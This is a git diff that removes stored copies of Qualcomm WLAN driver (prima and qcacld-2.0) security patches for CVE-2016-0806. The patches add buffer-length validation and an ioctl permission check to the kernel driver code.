-Return failure to applications if genie ioctl is invoked to configure
-WPS/WPA/RSN IEs with arguments of improper length.
-
-Bug: 27104184
-Change-Id: I31e288db41e14b24be0e430afed3a5e360da1370
-Signed-off-by: Yuan Lin
----
- drivers/staging/prima/CORE/HDD/src/wlan_hdd_wext.c | 39 +++++++++++++++++-----
- 1 file changed, 31 insertions(+), 8 deletions(-)
-
-diff --git a/drivers/staging/prima/CORE/HDD/src/wlan_hdd_wext.c b/drivers/staging/prima/CORE/HDD/src/wlan_hdd_wext.c
-index 558fc1b..095aa9d 100644
---- a/drivers/staging/prima/CORE/HDD/src/wlan_hdd_wext.c
-+++ b/drivers/staging/prima/CORE/HDD/src/wlan_hdd_wext.c
-@@ -1531,9 +1531,10 @@ static int iw_set_genie(struct net_device *dev,
- char *extra)
- {
- hdd_adapter_t *pAdapter = WLAN_HDD_GET_PRIV_PTR(dev);
-- hdd_wext_state_t *pWextState = WLAN_HDD_GET_WEXT_STATE_PTR(pAdapter);
-- u_int8_t *genie;
-- v_U16_t remLen;
-+ hdd_wext_state_t *pWextState = WLAN_HDD_GET_WEXT_STATE_PTR(pAdapter);
-+ u_int8_t *genie;
-+ v_U16_t remLen;
-+ int ret = 0;
-
- ENTER();
- if(!wrqu->data.length) {
-@@ -1570,7 +1571,10 @@ static int iw_set_genie(struct net_device *dev,
- {
- case IE_EID_VENDOR:
- if ((IE_LEN_SIZE+IE_EID_SIZE+IE_VENDOR_OUI_SIZE) > eLen) /* should have at least OUI */
-- return -EINVAL;
-+ {
-+ ret = -EINVAL;
-+ goto exit;
-+ }
-
- if (0 == memcmp(&genie[0], "\x00\x50\xf2\x04", 4))
- {
-@@ -1583,7 +1587,8 @@ static int iw_set_genie(struct net_device *dev,
- hddLog(VOS_TRACE_LEVEL_FATAL, "Cannot accommodate genIE. "
- "Need bigger buffer space\n");
- VOS_ASSERT(0);
-- return -ENOMEM;
-+ ret = -EINVAL;
-+ goto exit;
- }
- // save to Additional IE ; it should be accumulated to handle WPS IE + other IE
- memcpy( pWextState->genIE.addIEdata + curGenIELen, genie - 2, eLen + 2);
-@@ -1592,6 +1597,14 @@ static int iw_set_genie(struct net_device *dev,
- else if (0 == memcmp(&genie[0], "\x00\x50\xf2", 3))
- {
- hddLog (VOS_TRACE_LEVEL_INFO, "%s Set WPA IE (len %d)",__func__, eLen + 2);
-+ if ((eLen + 2) > (sizeof(pWextState->WPARSNIE)))
-+ {
-+ hddLog(VOS_TRACE_LEVEL_FATAL, "Cannot accommodate genIE. "
-+ "Need bigger buffer space");
-+ ret = -EINVAL;
-+ VOS_ASSERT(0);
-+ goto exit;
-+ }
- memset( pWextState->WPARSNIE, 0, MAX_WPA_RSN_IE_LEN );
- memcpy( pWextState->WPARSNIE, genie - 2, (eLen + 2));
- pWextState->roamProfile.pWPAReqIE = pWextState->WPARSNIE;
-@@ -1608,7 +1621,8 @@ static int iw_set_genie(struct net_device *dev,
- hddLog(VOS_TRACE_LEVEL_FATAL, "Cannot accommodate genIE. "
- "Need bigger buffer space\n");
- VOS_ASSERT(0);
-- return -ENOMEM;
-+ ret = -ENOMEM;
-+ goto exit;
- }
- // save to Additional IE ; it should be accumulated to handle WPS IE + other IE
- memcpy( pWextState->genIE.addIEdata + curGenIELen, genie - 2, eLen + 2);
-@@ -1617,6 +1631,14 @@ static int iw_set_genie(struct net_device *dev,
- break;
- case DOT11F_EID_RSN:
- hddLog (LOG1, "%s Set RSN IE (len %d)",__func__, eLen+2);
-+ if ((eLen + 2) > (sizeof(pWextState->WPARSNIE)))
-+ {
-+ hddLog(VOS_TRACE_LEVEL_FATAL, "Cannot accommodate genIE. "
-+ "Need bigger buffer space");
-+ ret = -EINVAL;
-+ VOS_ASSERT(0);
-+ goto exit;
-+ }
- memset( pWextState->WPARSNIE, 0, MAX_WPA_RSN_IE_LEN );
- memcpy( pWextState->WPARSNIE, genie - 2, (eLen + 2));
- pWextState->roamProfile.pRSNReqIE = pWextState->WPARSNIE;
-@@ -1625,13 +1647,14 @@ static int iw_set_genie(struct net_device *dev,
-
- default:
- hddLog (LOGE, "%s Set UNKNOWN IE %X",__func__, elementId);
-- return 0;
-+ goto exit;
- }
- genie += eLen;
- remLen -= eLen;
- }
-+ exit:
- EXIT();
-- return 0;
-+ return ret;
- }
-
- static int iw_get_genie(struct net_device *dev,
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-0806/prima/0012.patch b/Patches/Linux_CVEs/CVE-2016-0806/prima/0012.patch
deleted file mode 100644
index cf20c78b..00000000
--- a/Patches/Linux_CVEs/CVE-2016-0806/prima/0012.patch
+++ /dev/null
@@ -1,189 +0,0 @@ -From 72d3908cc1bcb075015f1b86001f4292ac41d38a Mon Sep 17 00:00:00 2001 -From: Mahesh A Saptasagar -Date: Wed, 13 Apr 2016 09:19:31 -0700 -Subject: qcacld 2.0: Validate ioctls for valid input length prima to - qcacld-2.0 propagation - -Return failure to applications if ioctl is invoked with arguments -of improper length. - -Bug: 27104184 -Change-Id: I4459c5f39ca9c7a852772913578bd2122cb73879 ---- - .../staging/prima/CORE/HDD/src/wlan_hdd_hostapd.c | 60 ++++++++++++++++++---- - 1 file changed, 49 insertions(+), 11 deletions(-) - -diff --git a/drivers/staging/prima/CORE/HDD/src/wlan_hdd_hostapd.c b/drivers/staging/prima/CORE/HDD/src/wlan_hdd_hostapd.c -index 005c193..9441a2a 100644 ---- a/drivers/staging/prima/CORE/HDD/src/wlan_hdd_hostapd.c -+++ b/drivers/staging/prima/CORE/HDD/src/wlan_hdd_hostapd.c -@@ -2151,7 +2151,8 @@ static int iw_softap_setwpsie(struct net_device *dev, - u_int8_t *pos; - tpSap_WPSIE pSap_WPSIe; - u_int8_t WPSIeType; -- u_int16_t length; -+ u_int16_t length; -+ int ret = 0; - ENTER(); - - if (!capable(CAP_NET_ADMIN)) -@@ -2183,8 +2184,8 @@ static int iw_softap_setwpsie(struct net_device *dev, - case DOT11F_EID_WPA: - if (wps_genie[1] < 2 + 4) - { -- vos_mem_free(pSap_WPSIe); -- return -EINVAL; -+ ret = -EINVAL; -+ goto exit; - } - else if (memcmp(&wps_genie[2], "\x00\x50\xf2\x04", 4) == 0) - { -@@ -2242,6 +2243,11 @@ static int iw_softap_setwpsie(struct net_device *dev, - pos += 2; - length = *pos<<8 | *(pos+1); - pos += 2; -+ if (length > sizeof(pSap_WPSIe->sapwpsie.sapWPSBeaconIE.UUID_E)) -+ { -+ ret = -EINVAL; -+ goto exit; -+ } - vos_mem_copy(pSap_WPSIe->sapwpsie.sapWPSBeaconIE.UUID_E, pos, length); - pSap_WPSIe->sapwpsie.sapWPSBeaconIE.FieldPresent |= WPS_BEACON_UUIDE_PRESENT; - pos += length; -@@ -2256,8 +2262,8 @@ static int iw_softap_setwpsie(struct net_device *dev, - - default: - hddLog (LOGW, "UNKNOWN TLV in WPS IE(%x)\n", (*pos<<8 | *(pos+1))); -- vos_mem_free(pSap_WPSIe); -- return -EINVAL; -+ ret = -EINVAL; -+ 
goto exit; - } - } - } -@@ -2269,8 +2275,8 @@ static int iw_softap_setwpsie(struct net_device *dev, - - default: - hddLog (LOGE, "%s Set UNKNOWN IE %X",__func__, wps_genie[0]); -- vos_mem_free(pSap_WPSIe); -- return 0; -+ ret = -EINVAL; -+ goto exit; - } - } - else if( wps_genie[0] == eQC_WPS_PROBE_RSP_IE) -@@ -2282,8 +2288,8 @@ static int iw_softap_setwpsie(struct net_device *dev, - case DOT11F_EID_WPA: - if (wps_genie[1] < 2 + 4) - { -- vos_mem_free(pSap_WPSIe); -- return -EINVAL; -+ ret = -EINVAL; -+ goto exit; - } - else if (memcmp(&wps_genie[2], "\x00\x50\xf2\x04", 4) == 0) - { -@@ -2347,6 +2353,11 @@ static int iw_softap_setwpsie(struct net_device *dev, - pos += 2; - length = *pos<<8 | *(pos+1); - pos += 2; -+ if (length > (sizeof(pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.UUID_E))) -+ { -+ ret = -EINVAL; -+ goto exit; -+ } - vos_mem_copy(pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.UUID_E, pos, length); - pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.FieldPresent |= WPS_PROBRSP_UUIDE_PRESENT; - pos += length; -@@ -2356,6 +2367,11 @@ static int iw_softap_setwpsie(struct net_device *dev, - pos += 2; - length = *pos<<8 | *(pos+1); - pos += 2; -+ if (length > (sizeof(pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.Manufacture.name))) -+ { -+ ret = -EINVAL; -+ goto exit; -+ } - pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.Manufacture.num_name = length; - vos_mem_copy(pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.Manufacture.name, pos, length); - pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.FieldPresent |= WPS_PROBRSP_MANUFACTURE_PRESENT; -@@ -2366,6 +2382,11 @@ static int iw_softap_setwpsie(struct net_device *dev, - pos += 2; - length = *pos<<8 | *(pos+1); - pos += 2; -+ if (length > (sizeof(pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.ModelName.text))) -+ { -+ ret = -EINVAL; -+ goto exit; -+ } - pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.ModelName.num_text = length; - vos_mem_copy(pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.ModelName.text, pos, length); - pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.FieldPresent |= 
WPS_PROBRSP_MODELNAME_PRESENT; -@@ -2375,6 +2396,11 @@ static int iw_softap_setwpsie(struct net_device *dev, - pos += 2; - length = *pos<<8 | *(pos+1); - pos += 2; -+ if (length > (sizeof(pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.ModelNumber.text))) -+ { -+ ret = -EINVAL; -+ goto exit; -+ } - pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.ModelNumber.num_text = length; - vos_mem_copy(pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.ModelNumber.text, pos, length); - pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.FieldPresent |= WPS_PROBRSP_MODELNUMBER_PRESENT; -@@ -2384,6 +2410,11 @@ static int iw_softap_setwpsie(struct net_device *dev, - pos += 2; - length = *pos<<8 | *(pos+1); - pos += 2; -+ if (length > (sizeof(pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.SerialNumber.text))) -+ { -+ ret = -EINVAL; -+ goto exit; -+ } - pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.SerialNumber.num_text = length; - vos_mem_copy(pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.SerialNumber.text, pos, length); - pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.FieldPresent |= WPS_PROBRSP_SERIALNUMBER_PRESENT; -@@ -2394,7 +2425,6 @@ static int iw_softap_setwpsie(struct net_device *dev, - pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.PrimaryDeviceCategory = (*pos<<8 | *(pos+1)); - hddLog(LOG1, "primary dev category: %d\n", pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.PrimaryDeviceCategory); - pos += 2; -- - vos_mem_copy(pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.PrimaryDeviceOUI, pos, HDD_WPS_DEVICE_OUI_LEN); - hddLog(LOG1, "primary dev oui: %02x, %02x, %02x, %02x\n", pos[0], pos[1], pos[2], pos[3]); - pos += 4; -@@ -2407,6 +2437,11 @@ static int iw_softap_setwpsie(struct net_device *dev, - pos += 2; - length = *pos<<8 | *(pos+1); - pos += 2; -+ if (length > (sizeof(pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.DeviceName.text))) -+ { -+ ret = -EINVAL; -+ goto exit; -+ } - pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.DeviceName.num_text = length; - vos_mem_copy(pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.DeviceName.text, pos, length); - pos += length; -@@ -2438,6 +2473,8 @@ static int 
iw_softap_setwpsie(struct net_device *dev, - } // switch - } - halStatus = WLANSAP_Set_WpsIe(pVosContext, pSap_WPSIe); -+ if (halStatus != eHAL_STATUS_SUCCESS) -+ ret = -EINVAL; - pHostapdState = WLAN_HDD_GET_HOSTAP_STATE_PTR(pHostapdAdapter); - if( pHostapdState->bCommit && WPSIeType == eQC_WPS_PROBE_RSP_IE) - { -@@ -2446,9 +2483,10 @@ static int iw_softap_setwpsie(struct net_device *dev, - WLANSAP_Update_WpsIe ( pVosContext ); - } - -+ exit: - vos_mem_free(pSap_WPSIe); - EXIT(); -- return halStatus; -+ return ret; - } - - static int iw_softap_stopbss(struct net_device *dev, --- -cgit v1.1 - diff --git a/Patches/Linux_CVEs/CVE-2016-0806/qcacld-2.0/0013.patch b/Patches/Linux_CVEs/CVE-2016-0806/qcacld-2.0/0013.patch deleted file mode 100644 index b255b265..00000000 --- a/Patches/Linux_CVEs/CVE-2016-0806/qcacld-2.0/0013.patch +++ /dev/null 
@@ -1,120 +0,0 @@ -From 055561f40f2baa5cdd74f952be55b61a3907279a Mon Sep 17 00:00:00 2001 -From: Amarnath Hullur Subramanyam -Date: Wed, 28 Oct 2015 16:56:58 -0700 -Subject: qcacld 2.0: Validate WPA and RSN IE for valid length - -prima to qcacld-2.0 propagation - -Return failure to applications if genie ioctl is invoked to configure -WPS/WPA/RSN IEs with arguments of improper length. - -CRs-Fixed: 931451 -Bug: 25344453 -Signed-off-by: Amarnath Hullur Subramanyam ---- - .../qcacld-2.0/CORE/HDD/src/wlan_hdd_wext.c | 37 ++++++++++++++++------ - 1 file changed, 27 insertions(+), 10 deletions(-) - -diff --git a/drivers/staging/qcacld-2.0/CORE/HDD/src/wlan_hdd_wext.c b/drivers/staging/qcacld-2.0/CORE/HDD/src/wlan_hdd_wext.c -index 38a13fa..93136df 100644 ---- a/drivers/staging/qcacld-2.0/CORE/HDD/src/wlan_hdd_wext.c -+++ b/drivers/staging/qcacld-2.0/CORE/HDD/src/wlan_hdd_wext.c -@@ -2270,11 +2270,12 @@ static int iw_set_genie(struct net_device *dev, - union iwreq_data *wrqu, - char *extra) - { -- hdd_adapter_t *pAdapter = WLAN_HDD_GET_PRIV_PTR(dev); -+ hdd_adapter_t *pAdapter = WLAN_HDD_GET_PRIV_PTR(dev); - hdd_wext_state_t *pWextState = WLAN_HDD_GET_WEXT_STATE_PTR(pAdapter); - u_int8_t *genie = NULL; - u_int8_t *base_genie = NULL; - v_U16_t remLen; -+ int ret = 0; - - ENTER(); - -@@ -2324,8 +2325,8 @@ static int iw_set_genie(struct net_device *dev, - case IE_EID_VENDOR: - if ((IE_LEN_SIZE+IE_EID_SIZE+IE_VENDOR_OUI_SIZE) > eLen) /* should have at least OUI */ - { -- kfree(base_genie); -- return -EINVAL; -+ ret = -EINVAL; -+ goto exit; - } - - if (0 == memcmp(&genie[0], "\x00\x50\xf2\x04", 4)) -@@ -2339,8 +2340,8 @@ static int iw_set_genie(struct net_device *dev, - hddLog(VOS_TRACE_LEVEL_FATAL, "Cannot accommodate genIE. 
" - "Need bigger buffer space"); - VOS_ASSERT(0); -- kfree(base_genie); -- return -ENOMEM; -+ ret = -EINVAL; -+ goto exit; - } - // save to Additional IE ; it should be accumulated to handle WPS IE + other IE - memcpy( pWextState->genIE.addIEdata + curGenIELen, genie - 2, eLen + 2); -@@ -2349,6 +2350,14 @@ static int iw_set_genie(struct net_device *dev, - else if (0 == memcmp(&genie[0], "\x00\x50\xf2", 3)) - { - hddLog (VOS_TRACE_LEVEL_INFO, "%s Set WPA IE (len %d)",__func__, eLen + 2); -+ if ((eLen + 2) > (sizeof(pWextState->WPARSNIE))) -+ { -+ hddLog(VOS_TRACE_LEVEL_FATAL, "Cannot accommodate genIE. " -+ "Need bigger buffer space"); -+ ret = -EINVAL; -+ VOS_ASSERT(0); -+ goto exit; -+ } - memset( pWextState->WPARSNIE, 0, MAX_WPA_RSN_IE_LEN ); - memcpy( pWextState->WPARSNIE, genie - 2, (eLen + 2)); - pWextState->roamProfile.pWPAReqIE = pWextState->WPARSNIE; -@@ -2365,8 +2374,8 @@ static int iw_set_genie(struct net_device *dev, - hddLog(VOS_TRACE_LEVEL_FATAL, "Cannot accommodate genIE. " - "Need bigger buffer space"); - VOS_ASSERT(0); -- kfree(base_genie); -- return -ENOMEM; -+ ret = -ENOMEM; -+ goto exit; - } - // save to Additional IE ; it should be accumulated to handle WPS IE + other IE - memcpy( pWextState->genIE.addIEdata + curGenIELen, genie - 2, eLen + 2); -@@ -2375,6 +2384,14 @@ static int iw_set_genie(struct net_device *dev, - break; - case DOT11F_EID_RSN: - hddLog (LOG1, "%s Set RSN IE (len %d)",__func__, eLen+2); -+ if ((eLen + 2) > (sizeof(pWextState->WPARSNIE))) -+ { -+ hddLog(VOS_TRACE_LEVEL_FATAL, "Cannot accommodate genIE. 
" -+ "Need bigger buffer space"); -+ ret = -EINVAL; -+ VOS_ASSERT(0); -+ goto exit; -+ } - memset( pWextState->WPARSNIE, 0, MAX_WPA_RSN_IE_LEN ); - memcpy( pWextState->WPARSNIE, genie - 2, (eLen + 2)); - pWextState->roamProfile.pRSNReqIE = pWextState->WPARSNIE; -@@ -2383,15 +2400,15 @@ static int iw_set_genie(struct net_device *dev, - - default: - hddLog (LOGE, "%s Set UNKNOWN IE %X",__func__, elementId); -- kfree(base_genie); -- return 0; -+ goto exit; - } - genie += eLen; - remLen -= eLen; - } -+exit: - EXIT(); - kfree(base_genie); -- return 0; -+ return ret; - } - - static int iw_get_genie(struct net_device *dev, --- -cgit v1.1 - diff --git a/Patches/Linux_CVEs/CVE-2016-0806/qcacld-2.0/0014.patch b/Patches/Linux_CVEs/CVE-2016-0806/qcacld-2.0/0014.patch deleted file mode 100644 index dd9724e2..00000000 --- a/Patches/Linux_CVEs/CVE-2016-0806/qcacld-2.0/0014.patch +++ /dev/null 
@@ -1,36 +0,0 @@
-From f31e58289c8ebded58ffe1d4709e2f878765b0a6 Mon Sep 17 00:00:00 2001
-From: Amarnath Hullur Subramanyam
-Date: Wed, 28 Oct 2015 17:38:59 -0700
-Subject: qcacld 2.0: Address buffer overflow due to invalid length
-
-prima to qcacld-2.0 propagation
-
-Check for valid length before copying the packet filter data from
-userspace buffer to kernel space buffer to avoid buffer overflow
-issue.
-
-CRs-Fixed: 930533
-Git-commit: a079d716b5481223f0166c644e9ec7c75a31b02c
-Bug: 25344453
-Signed-off-by: Amarnath Hullur Subramanyam
----
- drivers/staging/qcacld-2.0/CORE/HDD/src/wlan_hdd_wext.c | 3 +++
- 1 file changed, 3 insertions(+)
-
-diff --git a/drivers/staging/qcacld-2.0/CORE/HDD/src/wlan_hdd_wext.c b/drivers/staging/qcacld-2.0/CORE/HDD/src/wlan_hdd_wext.c
-index 93136df..0b1ee24 100644
---- a/drivers/staging/qcacld-2.0/CORE/HDD/src/wlan_hdd_wext.c
-+++ b/drivers/staging/qcacld-2.0/CORE/HDD/src/wlan_hdd_wext.c
-@@ -8376,6 +8376,9 @@ int wlan_hdd_set_filter(hdd_context_t *pHddCtx, tpPacketFilterCfg pRequest,
-
- hddLog(VOS_TRACE_LEVEL_INFO, "Data Offset %d Data Len %d",
- pRequest->paramsData[i].dataOffset, pRequest->paramsData[i].dataLength);
-+ if ((sizeof(packetFilterSetReq.paramsData[i].compareData)) <
-+ (pRequest->paramsData[i].dataLength))
-+ return -EINVAL;
-
- memcpy(&packetFilterSetReq.paramsData[i].compareData,
- pRequest->paramsData[i].compareData, pRequest->paramsData[i].dataLength);
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-0806/qcacld-2.0/0015.patch b/Patches/Linux_CVEs/CVE-2016-0806/qcacld-2.0/0015.patch
deleted file mode 100644
index 45549451..00000000
--- a/Patches/Linux_CVEs/CVE-2016-0806/qcacld-2.0/0015.patch
+++ /dev/null
@@ -1,188 +0,0 @@ -From 255dd931573beb3afca15909f483f26db22a5c98 Mon Sep 17 00:00:00 2001 -From: Amarnath Hullur Subramanyam -Date: Wed, 28 Oct 2015 20:58:02 -0700 -Subject: qcacld 2.0: Validate ioctls for valid input length - -prima to qcacld-2.0 propagation - -Return failure to applications if ioctl is invoked with arguments -of improper length. - -CRs-Fixed: 930542 -Git-commit: 8bd73c3452ab22ba9bdbaac5ab12de2ed25fcb9d -Bug: 25344453 -Signed-off-by: Amarnath Hullur Subramanyam ---- - .../qcacld-2.0/CORE/HDD/src/wlan_hdd_hostapd.c | 62 +++++++++++++++++----- - 1 file changed, 48 insertions(+), 14 deletions(-) - -diff --git a/drivers/staging/qcacld-2.0/CORE/HDD/src/wlan_hdd_hostapd.c b/drivers/staging/qcacld-2.0/CORE/HDD/src/wlan_hdd_hostapd.c -index 1f56db2..51ee547 100644 ---- a/drivers/staging/qcacld-2.0/CORE/HDD/src/wlan_hdd_hostapd.c -+++ b/drivers/staging/qcacld-2.0/CORE/HDD/src/wlan_hdd_hostapd.c -@@ -3880,6 +3880,7 @@ static int iw_softap_setwpsie(struct net_device *dev, - u_int8_t WPSIeType; - u_int16_t length; - struct iw_point s_priv_data; -+ int ret = 0; - - ENTER(); - -@@ -3925,9 +3926,8 @@ static int iw_softap_setwpsie(struct net_device *dev, - case DOT11F_EID_WPA: - if (wps_genie[1] < 2 + 4) - { -- vos_mem_free(pSap_WPSIe); -- kfree(fwps_genie); -- return -EINVAL; -+ ret = -EINVAL; -+ goto exit; - } - else if (memcmp(&wps_genie[2], "\x00\x50\xf2\x04", 4) == 0) - { -@@ -3985,6 +3985,11 @@ static int iw_softap_setwpsie(struct net_device *dev, - pos += 2; - length = *pos<<8 | *(pos+1); - pos += 2; -+ if (length > sizeof(pSap_WPSIe->sapwpsie.sapWPSBeaconIE.UUID_E)) -+ { -+ ret = -EINVAL; -+ goto exit; -+ } - vos_mem_copy(pSap_WPSIe->sapwpsie.sapWPSBeaconIE.UUID_E, pos, length); - pSap_WPSIe->sapwpsie.sapWPSBeaconIE.FieldPresent |= WPS_BEACON_UUIDE_PRESENT; - pos += length; -@@ -3999,9 +4004,8 @@ static int iw_softap_setwpsie(struct net_device *dev, - - default: - hddLog (LOGW, "UNKNOWN TLV in WPS IE(%x)", (*pos<<8 | *(pos+1))); -- 
vos_mem_free(pSap_WPSIe); -- kfree(fwps_genie); -- return -EINVAL; -+ ret = -EINVAL; -+ goto exit; - } - } - } -@@ -4013,9 +4017,8 @@ static int iw_softap_setwpsie(struct net_device *dev, - - default: - hddLog (LOGE, "%s Set UNKNOWN IE %X",__func__, wps_genie[0]); -- vos_mem_free(pSap_WPSIe); -- kfree(fwps_genie); -- return 0; -+ ret = -EINVAL; -+ goto exit; - } - } - else if( wps_genie[0] == eQC_WPS_PROBE_RSP_IE) -@@ -4027,9 +4030,8 @@ static int iw_softap_setwpsie(struct net_device *dev, - case DOT11F_EID_WPA: - if (wps_genie[1] < 2 + 4) - { -- vos_mem_free(pSap_WPSIe); -- kfree(fwps_genie); -- return -EINVAL; -+ ret = -EINVAL; -+ goto exit; - } - else if (memcmp(&wps_genie[2], "\x00\x50\xf2\x04", 4) == 0) - { -@@ -4093,6 +4095,11 @@ static int iw_softap_setwpsie(struct net_device *dev, - pos += 2; - length = *pos<<8 | *(pos+1); - pos += 2; -+ if (length > (sizeof(pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.UUID_E))) -+ { -+ ret = -EINVAL; -+ goto exit; -+ } - vos_mem_copy(pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.UUID_E, pos, length); - pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.FieldPresent |= WPS_PROBRSP_UUIDE_PRESENT; - pos += length; -@@ -4102,6 +4109,11 @@ static int iw_softap_setwpsie(struct net_device *dev, - pos += 2; - length = *pos<<8 | *(pos+1); - pos += 2; -+ if (length > (sizeof(pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.Manufacture.name))) -+ { -+ ret = -EINVAL; -+ goto exit; -+ } - pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.Manufacture.num_name = length; - vos_mem_copy(pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.Manufacture.name, pos, length); - pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.FieldPresent |= WPS_PROBRSP_MANUFACTURE_PRESENT; -@@ -4112,6 +4124,11 @@ static int iw_softap_setwpsie(struct net_device *dev, - pos += 2; - length = *pos<<8 | *(pos+1); - pos += 2; -+ if (length > (sizeof(pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.ModelName.text))) -+ { -+ ret = -EINVAL; -+ goto exit; -+ } - pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.ModelName.num_text = length; - 
vos_mem_copy(pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.ModelName.text, pos, length); - pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.FieldPresent |= WPS_PROBRSP_MODELNAME_PRESENT; -@@ -4121,6 +4138,11 @@ static int iw_softap_setwpsie(struct net_device *dev, - pos += 2; - length = *pos<<8 | *(pos+1); - pos += 2; -+ if (length > (sizeof(pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.ModelNumber.text))) -+ { -+ ret = -EINVAL; -+ goto exit; -+ } - pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.ModelNumber.num_text = length; - vos_mem_copy(pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.ModelNumber.text, pos, length); - pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.FieldPresent |= WPS_PROBRSP_MODELNUMBER_PRESENT; -@@ -4130,6 +4152,11 @@ static int iw_softap_setwpsie(struct net_device *dev, - pos += 2; - length = *pos<<8 | *(pos+1); - pos += 2; -+ if (length > (sizeof(pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.SerialNumber.text))) -+ { -+ ret = -EINVAL; -+ goto exit; -+ } - pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.SerialNumber.num_text = length; - vos_mem_copy(pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.SerialNumber.text, pos, length); - pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.FieldPresent |= WPS_PROBRSP_SERIALNUMBER_PRESENT; -@@ -4153,6 +4180,11 @@ static int iw_softap_setwpsie(struct net_device *dev, - pos += 2; - length = *pos<<8 | *(pos+1); - pos += 2; -+ if (length > (sizeof(pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.DeviceName.text))) -+ { -+ ret = -EINVAL; -+ goto exit; -+ } - pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.DeviceName.num_text = length; - vos_mem_copy(pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.DeviceName.text, pos, length); - pos += length; -@@ -4189,6 +4221,8 @@ static int iw_softap_setwpsie(struct net_device *dev, - #else - halStatus = WLANSAP_Set_WpsIe(pVosContext, pSap_WPSIe); - #endif -+ if (halStatus != eHAL_STATUS_SUCCESS) -+ ret = -EINVAL; - pHostapdState = WLAN_HDD_GET_HOSTAP_STATE_PTR(pHostapdAdapter); - if( pHostapdState->bCommit && WPSIeType == eQC_WPS_PROBE_RSP_IE) - { -@@ -4200,11 +4234,11 @@ static int 
iw_softap_setwpsie(struct net_device *dev, - WLANSAP_Update_WpsIe ( pVosContext ); - #endif - } -- -+exit: - vos_mem_free(pSap_WPSIe); - kfree(fwps_genie); - EXIT(); -- return halStatus; -+ return ret; - } - - static int iw_softap_stopbss(struct net_device *dev, --- -cgit v1.1 - diff --git a/Patches/Linux_CVEs/CVE-2016-0806/qcacld-2.0/0016.patch b/Patches/Linux_CVEs/CVE-2016-0806/qcacld-2.0/0016.patch deleted file mode 100644 index 3ed18cba..00000000 --- a/Patches/Linux_CVEs/CVE-2016-0806/qcacld-2.0/0016.patch +++ /dev/null 
@@ -1,41 +0,0 @@
-From d4b451bd06ad53ed785cbda4272c54788b1537d4 Mon Sep 17 00:00:00 2001
-From: Amarnath Hullur Subramanyam
-Date: Wed, 28 Oct 2015 20:59:45 -0700
-Subject: wlan:Check priviledge permission before processing SET_OEM_DATA_REQ
- IOCTL
-
-Kernel assumes all SET IOCTL commands are assigned with even
-numbers. But in our WLAN driver, some SET IOCTLS are assigned with
-odd numbers. This leads kernel fail to check, for some SET IOCTLs,
-whether user has the right permission to do SET operation.
-Hence, in driver, before processing SET_OEM_DATA_REQ IOCTLs, making
-sure user task has right permission to process the command.
-
-CRs-Fixed: 930549
-Git-commit: 6feb2faf80a05940618aa2eef2b62e4e2e54f148
-Bug: 25344453
-Signed-off-by: Amarnath Hullur Subramanyam
----
- drivers/staging/qcacld-2.0/CORE/HDD/src/wlan_hdd_oemdata.c | 6 ++++++
- 1 file changed, 6 insertions(+)
-
-diff --git a/drivers/staging/qcacld-2.0/CORE/HDD/src/wlan_hdd_oemdata.c b/drivers/staging/qcacld-2.0/CORE/HDD/src/wlan_hdd_oemdata.c
-index dbec0fc..26d0b5f 100644
---- a/drivers/staging/qcacld-2.0/CORE/HDD/src/wlan_hdd_oemdata.c
-+++ b/drivers/staging/qcacld-2.0/CORE/HDD/src/wlan_hdd_oemdata.c
-@@ -189,6 +189,12 @@ int iw_set_oem_data_req(
- hdd_adapter_t *pAdapter = (netdev_priv(dev));
- hdd_wext_state_t *pwextBuf = WLAN_HDD_GET_WEXT_STATE_PTR(pAdapter);
-
-+ if (!capable(CAP_NET_ADMIN)) {
-+ VOS_TRACE(VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_ERROR,
-+ FL("permission check failed"));
-+ return -EPERM;
-+ }
-+
- if ((WLAN_HDD_GET_CTX(pAdapter))->isLogpInProgress)
- {
- VOS_TRACE(VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_FATAL,
---
-cgit v1.1
-
